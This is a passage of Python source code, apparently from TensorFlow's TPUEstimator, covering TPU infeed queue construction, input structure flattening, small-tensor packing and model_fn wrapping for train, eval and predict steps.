num_replicas_per_host = max(1, ctx.num_of_replicas_per_host)
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
# This avoids inconsistent state among different model replcias.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
enqueue_datas_list.append(enqueue_data)
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(shard_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=shard_id)
else:
return shard_id % num_replicas_per_host
def device_function_impl(shard_id):
# shard_id ranges from 0 to num_of_replicas_per_host - 1.
# A shard is a replica inside a host.
# In broadcast mode (generate_broadcast_enqueue_ops_fn), the enqueue ops
# are always executed on the first host. Thus shard_id equals to replica_id.
return ctx.tpu_host_placement_function(replica_id=shard_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
array_ops.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# for each core, slice out the flattened_inputs for each core.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class TensorPacker(object):
"""Pack and unpack small tensors into a big one for efficiency."""
def __init__(self, small_feature_dim_size,
minimum_num_small_features_to_group):
self._small_feature_dim_size = small_feature_dim_size
self._minimum_num_small_features_to_group = (
minimum_num_small_features_to_group)
def maybe_concatenate_features(self, features):
"""If there are enough small tensors, concat them for performance."""
self._small_feature_names = {}
self._small_feature_sizes = {}
feature_names = _extract_key_names(features)
if feature_names: # Not a single tensor.
# First pass: see if it is worth concatenating the small features.
for name in feature_names:
tensor = features[name]
# We do not handle nested inputs here.
if not isinstance(tensor, ops.Tensor):
return
shape = tensor.get_shape().as_list()
dtype = tensor.dtype
if (len(shape) == 2 and
shape[1] <= self._small_feature_dim_size):
logging.info('Found small feature: %s %s', name, shape)
if tensor.dtype not in self._small_feature_names:
self._small_feature_names[dtype] = []
self._small_feature_sizes[dtype] = []
self._small_feature_names[dtype].append(name)
self._small_feature_sizes[dtype].append(shape[1])
dtypes_ = list(self._small_feature_names.keys())
for dtype in dtypes_:
# If we could find 5 (or more) [batch_size, 1] dense features,
# we will group them.
if (len(self._small_feature_names[dtype]) <
self._minimum_num_small_features_to_group):
self._small_feature_names.pop(dtype) # reset
self._small_feature_sizes.pop(dtype) # reset
# Second pass: separate small features out
small_feature_tensors = {}
for dtype in self._small_feature_names:
small_feature_tensors[dtype] = []
for name in self._small_feature_names[dtype]:
small_feature_tensors[dtype].append(features.pop(name))
# Add the concat Tensor to features with a special key.
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
if key in features:
raise ValueError('{} is reserved as feature key for concatenated'
'small features.')
features[key] = (array_ops.concat(small_feature_tensors[dtype], axis=1))
def maybe_split_features(self, maybe_concatenated_features):
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
concatenated_small_features = maybe_concatenated_features.pop(key)
splits = array_ops.split(
concatenated_small_features, self._small_feature_sizes[dtype], axis=1)
for name, split in zip(self._small_feature_names[dtype], splits):
maybe_concatenated_features[name] = split
def _get_small_feature_key(self, dtype):
return _TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY + '_' + str(dtype)
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested sturcture
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
as that expectes flattend lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, features, labels, feature_dims, label_dims):
"""Flatten input dims with the same order as flattened input tensors."""
try:
flattened_input_dims = data_nest.flatten_up_to(features, feature_dims)
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched the structure of'
' features. input_partition_dims[0]: {}, features {}. {}'.format(
feature_dims, features, e))
if labels is not None:
if label_dims is not None:
try:
flattened_input_dims.extend(
data_nest.flatten_up_to(labels, self._label_dims))
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched the structure of'
' labels. input_partition_dims[1]: {}, labels: {}. {}'.format(
label_dims, labels, e))
else:
num_label_tensors = len(data_nest.flatten(labels))
flattened_input_dims.extend([None] * num_label_tensors)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
features, labels, self._feature_dims, self._label_dims)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self.tensor_packer = TensorPacker(
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE,
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP)
self.tensor_packer.maybe_concatenate_features(features)
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
features = unflattened_inputs['features']
self.tensor_packer.maybe_split_features(features)
return _Inputs(
features,
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
# This branch handles two senarios:
# num_cores_per_replica > num_cores_per_host
# and num_cores_per_replica <= num_cores_per_host
# First, get the set of host_ids, by iterating replicas.
# We only want and will get the set of *unique* host_ids
# *that will call input_fn*. For each replica, we only call the input_fn
# from the CPU host that contains logical core 0.
host_device_ids = set()
for replica_id in xrange(self._ctx.num_replicas):
host_device, _ = self._ctx.device_for_replica(replica_id)
# TODO(lehou): Get host_id in a better way.
host_id = int(host_device.split('/task:')[1].split('/device:')[0])
host_device_ids.add(host_id)
for host_id in host_device_ids:
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Perform some sanity checks to log user friendly information. We should
error out to give users better error message. But, if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so, log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation_inputs,
computation,
batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
computation: A Python function that takes no inputs and builds computation
graph. If `computation` returns m outputs, this function will return a
list of m Tensors.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
# Not using Batching Function but use TPUPartitionedCall/all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
# Use Batching Function and TPUPartitionedCall/all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
ordered_inputs_list = nest.flatten(computation_inputs)
@batch_ops.batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = nest.pack_sequence_as(computation_inputs,
tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(
self._ctx, outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(step):
"""Training step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_)
)
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(scaled_gradients)
]
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op(step)
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
host_call.record({
'host_call': (lambda loss_t: loss_t,
[array_ops.reshape(loss, [1])])
})
host_call_outfeed_ops = host_call.create_enqueue_op(step)
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
